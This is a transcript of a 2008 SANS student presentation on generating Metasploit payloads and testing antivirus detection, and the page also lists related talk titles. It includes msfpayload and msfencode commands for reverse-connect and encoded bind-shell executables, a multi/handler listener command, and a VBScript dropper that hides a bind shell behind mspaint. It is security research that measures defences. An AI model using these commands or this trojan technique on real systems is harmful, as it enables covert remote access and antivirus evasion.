1 SANS Technology Institute - Candidate for Master of Science Degree 1 Metasploit Payloads and Antivirus Mark Baggett December 2008 GIAC GSEC GCIH.

Slides:



Advertisements
Similar presentations
What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.
Advertisements

Lecture Materials for the John Wiley & Sons book: Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions October 12, 2014 DRAFT1.
Part 2 Penetration Testing. Review 2-minute exercise: RECON ONLY Find 3x IP addresses at the U.S. Merchant Marine Academy Google: “U.S. Merchant Marine.
Ensuring Operating System Kernel Integrity with OSck By Owen S. Hofmann Alan M. Dunn Sangman Kim Indrajit Roy Emmett Witchel Kent State University College.
Armitage and Metasploit Penetration Testing Lab
Presenter: Robbie Corley Organization: KCTCS
Moving Target Defense in Cyber Security
1 SANS Technology Institute - Candidate for Master of Science Degree 1 Baselining Windows and Comparative Analysis: Quick and Easy Kevin Fuller May 2012.
1 SANS Technology Institute - Candidate for Master of Science Degree 1 SIEM Based Intrusion Detection Jim Beechey March 2010 GSEC Gold, GCIA Gold, GCIH,
Offensive Security Part 1 Basics of Penetration Testing
A Complete Tool For System Penetration Testing Presented By:- Mahesh Kumar Sharma B.Tech IV Year Computer Science Roll No. :- CS09047.
Project - 1 5/4/2011 The University of Massachusetts Lowell Anthony Gabrielson Adam Helbling.
ITP 457 Network Security Network Hacking 101. Hacking Methodology (review) 1. Gather target information 2. Identify services and ports open on the target.
Computer Security and Penetration Testing
Browser Exploitation Framework (BeEF) Lab
Guide To UNIX Using Linux Third Edition
Buffer Overflow Attacks. Memory plays a key part in many computer system functions. It’s a critical component to many internal operations. From mother.
Dennis  Application Security Specialist  WhiteHat Security  Full-Time Student  University of Houston – Main Campus ▪ Computer.
By Jeerarat Boonyanit. As you can see I have chosen Cpanel for my server management tool. cPanel is a Linux based web hosting control panel that provides.
W3af LUCA ALEXANDRA ADELA – MISS 1. w3af  Web Application Attack and Audit Framework  Secures web applications by finding and exploiting web application.
1Federal Network Systems, LLC CIS Network Security Instructor Professor Mort Anvair Notice: Use and Disclosure of Data. Limited Data Rights. This proposal.
Batch Files and Scripts Vic Laurie PPCUG June 9, 2003.
HTML5 Group 3: Dongyang Zhang, Wei Liu, Weizhou He, Yutong Wei, Yuxin Zhu.
SANS Technology Institute - Candidate for Master of Science Degree
Trying to like a boss… REVERSE ENGINEERING. WHAT EVEN IS… REVERSE ENGINEERING?? Reverse engineering is the process of disassembling and analyzing a particular.
Application Security: General apps &Web service (April 11, 2012) © Abdou Illia – Spring 2012.
BY ANDREA ALMEIDA T.E COMP DON BOSCO COLLEGE OF ENGINEERING.
MIS Week 2 Site:
Port Scanning 0x470~0x480 Presenter SangDuk Seo 1.
The Pipeline Processing Framework LSST Applications Meeting IPAC Feb. 19, 2008 Raymond Plante National Center for Supercomputing Applications.
Computer Security and Penetration Testing
Binary Auditing Geller Bedoya Michael Wozniak. Background  Binary auditing is a technique used to test the security and discover the inner workings of.
Computer Programming A program is a set of instructions a computer follows in order to perform a task. solve a problem Collectively, these instructions.
Kali Linx Attacks Jim Nasto. Window 8 Computer On my Windows 8 64 bit OS machine. I started using a Virtual Machine using Hyper V Manager and shared the.
MIS Week 1 Site:
Robert Crawford, MBA West Middle School.  Explain how the binary system is used by computers.  Describe how software is written and translated  Summarize.
Penetration Testing 101 (Boot-camp)
Panda Anti-Rootkit & password storage tools
CNIT 124: Advanced Ethical Hacking Ch 10: Client-Side Exploitation.
1 SANS Technology Institute - Candidate for Master of Science Degree 1 Covering the Tracks on Mac OS X Charlie Scott November 2010 GIAC GSEC Gold, GCIH.
 Programming - the process of creating computer programs.
Computer virus Speaker : 蔡尚倫.  Introduction  Infection target  Infection techniques Outline.
MIS Week 1 Site:
JMU GenCyber Boot Camp Summer, “Canned” Exploits For many known vulnerabilities attackers do not have to write their own exploit code Many repositories.
Securing a Host Computer BY STEPHEN GOSNER. Definition of a Host  Host  In networking, a host is any device that has an IP address.  Hosts include.
Some of the utilities associated with the development of programs. These program development tools allow users to write and construct programs that the.
General Information: This document was created for use in the "Bridges to Computing" project of Brooklyn College. You are invited and encouraged to use.
CIS 4930 / CIS 5930 Offensive Computer Security Spring 2014 I only edited it again.
Tactical Meterpreter Scripting Carlos PerezDarkoperatorCarlos_perez[at]darkoperator.com DarkoperatorCarlos_perez[at]darkoperator.com.
Common System Exploits Tom Chothia Computer Security, Lecture 17.
Metasploit Framework (MSF) Fundamentals
Overflows Mark Shtern.
Bypassing Antivirus API
Adversary playbook.
PART 1 – FILE UPLOAD BACKDOORS: METASPLOIT
Network Exploitation Tool
Metasploit a one-stop hack shop
Secure Software Development: Theory and Practice
Module 22 (Metasploit Introduction)
CIT 480: Securing Computer Systems
Metasploit Project For this exploit I will be using the following strategy Create backdoor exe file Upload file to website Have victim computer download.
Linux Exploitation Tools
Metasploit Assignment
Format String.
Metasploit Analysis Report Overview
Crisis and Aftermath Morris worm.
Setup a VM to use for analyzing malware
Penetration Testing & Network Defense
Exploitation Part 1.
SHELLSHOCK ATTACK.
Presentation transcript:

1 SANS Technology Institute - Candidate for Master of Science Degree 1 Metasploit Payloads and Antivirus Mark Baggett December 2008 GIAC GSEC GCIH

SANS Technology Institute - Candidate for Master of Science Degree 2 Objectives Learn how an attacker might use Metasploit standalone payloads against you See how these payloads are created, used and “trojanized” Understand what level of protection to expect from your antivirus

SANS Technology Institute - Candidate for Master of Science Degree 3 How are they used against you? Can be executed by tricking a user into running the payload or via an exploit that is not in the framework Execute a payload on a fully patched system Use Meterpreter’s advanced functionality such as anti-forensics, detection evasion, and pivoting Scenario: –Attacker bruteforces password to a fully patched machine –Runs Meterpreter payload and uses it to pivot –Uses framework to attack other hosts on DMZ

SANS Technology Institute - Candidate for Master of Science Degree 4 msfpayload Generates payloads in various formats –Source code in C, Perl, Ruby, Java –Hexadecimal (RAW) –Binary executable formats for Win32; Linux; OS X on Intel, PPC, iPhone –Java automatically selects Big Endian or Little Endian depending upon processor of targeted payload –You can override this with a simple modification to msfpayload (js_be, js_le)

SANS Technology Institute - Candidate for Master of Science Degree 5 Demonstration See how these payloads are created

SANS Technology Institute - Candidate for Master of Science Degree 6 Interacting with payloads Some payloads will not work standalone –find_port, find_tag Bind shell payloads can be used outside of the framework Others require the use of the multi/handler exploit

SANS Technology Institute - Candidate for Master of Science Degree 7 Using multi/handler./msfcli exploit/multi/handler \ PAYLOAD=windows/vncinject/reverse_tcp \ RHOST= \ DisableCourtesyShell=TRUE E./msfpayload \ windows/vncinjection/reverse_tcp \ LHOST= X > vncrev.exe CREATION - LHOST is the attacker’s IP USE - RHOST is the victim’s IP

SANS Technology Institute - Candidate for Master of Science Degree 8 Demonstration See how these payloads are used

SANS Technology Institute - Candidate for Master of Science Degree 9 msfencode Will encode a payload using one of various algorithms Expects RAW msfpayload as input -h for help -l list of available encoders -e encoder to use -t output type -b characters to avoid

SANS Technology Institute - Candidate for Master of Science Degree 10 msfencode -> Binary Binary was not a selectable output type from msfencode until Sept 29 th ways to create a binary –Add 3 lines of code to msfencode –Generate RAW output and use a hex editor to place it in a binary PE format –Generate C source code and compile it -t exe option will encode a Windows binary

SANS Technology Institute - Candidate for Master of Science Degree 11 msfencode (continued)./msfpayload windows/shell_bind_tcp R |\./msfencode -e x86/shikata_ga_nia -t exe./msfpayload windows/shell_bind_tcp R |\./msfencode -e x86/shikata_ga_nia –b\ “\x41\x42\x43” -t exe Text.to_win32pe() uses /data/templates –Use your own binaries with “PAYLOAD:” tag –To_win32pe chooses a random base relocation address (4 bytes at position 0x88) –Roll your own with template.c

SANS Technology Institute - Candidate for Master of Science Degree 12 Turning payloads into trojans IExpress is a setup utility that comes with Windows XP Can create packages that visibly execute a benign host program and invisibly execute a malicious payload All you need is a small VBscript to execute your payload invisibly Trojan payloads only temporarily avoid antivirus

SANS Technology Institute - Candidate for Master of Science Degree 13 Payload script The script Set WshShell = WScript.CreateObject("WScript.Shell") WshShell.Run "mspaint.exe",1, False Wshshell.Run "bindshell.exe",0, False Quick IExpress Demonstration –See how these payloads are “trojanized”

SANS Technology Institute - Candidate for Master of Science Degree 14 Level of protection to expect from your antivirus Expected results: Low rate of detection for unencoded payloads and no detection for encoded payloads Actual results: No detection for unencoded payloads or encoded payloads 2 products’ heuristics flagged payloads Pauldotcom Episode 125 at the end of September 2008 found 6 systems detected the payload My HIPS testing yielded disappointing results HD Moore has stated that version 3.2 will generate a new Windows Binary that is harder to detect.

SANS Technology Institute - Candidate for Master of Science Degree 15 Summary Metasploit is a powerful framework with a diverse set of tools Using these tools attackers can easily create standalone payloads that run on fully patched systems Antivirus products do not at this time provide adequate protection against Metasploit payloads My paper is in the SANS reading room titled “Effectiveness of Antivirus Detecting Metasploit Payloads”